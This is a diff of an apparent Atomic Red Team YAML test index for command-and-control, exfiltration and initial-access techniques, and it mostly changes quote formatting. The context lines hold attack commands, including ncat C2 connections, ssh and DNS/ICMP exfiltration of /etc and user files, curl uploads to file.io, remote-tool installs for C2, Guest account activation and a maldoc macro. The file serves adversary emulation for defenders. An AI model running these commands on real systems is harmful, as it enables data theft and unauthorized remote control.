@@ -69453,29 +69453,29 @@ command-and-control: dependencies: - description: 'The whois and timeout commands must be present - ' +' prereq_command: 'which whois && which timeout - ' +' get_prereq_command: 'echo "Please install timeout and the whois package" - ' +' executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -69509,7 +69509,7 @@ command-and-control: name: command_prompt command: 'finger base64_filedata@#{remote_host} - ' +' - name: Download a file with IMEWDBLD.exe auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2 description: | @@ -69557,10 +69557,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -69603,10 +69603,10 @@ command-and-control: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl 
@@ -69615,13 +69615,13 @@ command-and-control: Remove-Item $env:temp\curl.zip - description: 'A file must be created to upload - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path} - ' +' executor: command: | #{curl_path} -T #{file_path} #{remote_destination} @@ -69719,7 +69719,7 @@ command-and-control: executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server} - ' +' cleanup_command: | unset http_proxy unset https_proxy @@ -70108,10 +70108,10 @@ command-and-control: dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe}) - ' +' prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null @@ -70125,7 +70125,7 @@ command-and-control: executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} - ' +' name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e @@ -70274,13 +70274,13 @@ command-and-control: executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port} - ' +' name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet. - ' +' supported_platforms: - linux - macos @@ -70296,7 +70296,7 @@ command-and-control: executor: command: 'telnet #{domain} #{port} - ' +' name: sh T1102.003: technique: @@ -70538,7 +70538,7 @@ command-and-control: -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content } - ' +' name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b 
@@ -70728,7 +70728,7 @@ command-and-control: and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70749,7 +70749,7 @@ command-and-control: and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70768,7 +70768,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70788,7 +70788,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -70874,7 +70874,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. - ' +' supported_platforms: - macos - linux @@ -71180,7 +71180,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71385,7 +71385,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks - ' +' supported_platforms: - macos - linux 
@@ -71404,12 +71404,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 - ' +' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -71417,7 +71417,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; - ' +' name: sh T1048: technique: @@ -71496,7 +71496,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz - ' +' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -71526,7 +71526,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' - ' +' name: sh - name: DNSExfiltration (doh) auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 @@ -71562,20 +71562,20 @@ exfiltration: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module}) - ' +' prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module} - ' +' executor: command: | Import-Module #{ps_module} @@ -71639,7 +71639,7 @@ exfiltration: auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: 'Exfiltrate data HTTPS using curl to file share site file.io - ' +' supported_platforms: - windows input_arguments: 
@@ -71655,10 +71655,10 @@ exfiltration: dependencies: - description: 'Curl must be installed on system. - ' +' prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -71674,7 +71674,7 @@ exfiltration: auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 description: 'Exfiltrate data HTTPS using curl to file share site file.io - ' +' supported_platforms: - macos - linux @@ -71775,7 +71775,7 @@ exfiltration: auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932 description: 'Exfiltrates a file present on the victim machine to the C2 server. - ' +' supported_platforms: - windows input_arguments: @@ -72028,13 +72028,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } - ' +' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. - ' +' supported_platforms: - linux executor: @@ -72079,7 +72079,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell input_arguments: input_file: @@ -72482,7 +72482,7 @@ initial-access: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows 
@@ -72517,20 +72517,20 @@ initial-access: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1195.003: technique: external_references: @@ -72768,7 +72768,7 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -72779,10 +72779,10 @@ initial-access: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -73096,7 +73096,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: @@ -73109,12 +73109,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -73483,7 +73483,7 @@ initial-access: cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore - ' +' - name: Word spawned a command shell and used an IP address in the command line auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f description: | 
@@ -73495,7 +73495,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -73506,7 +73506,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -73517,7 +73517,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -73526,7 +73526,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell T1566.002: technique: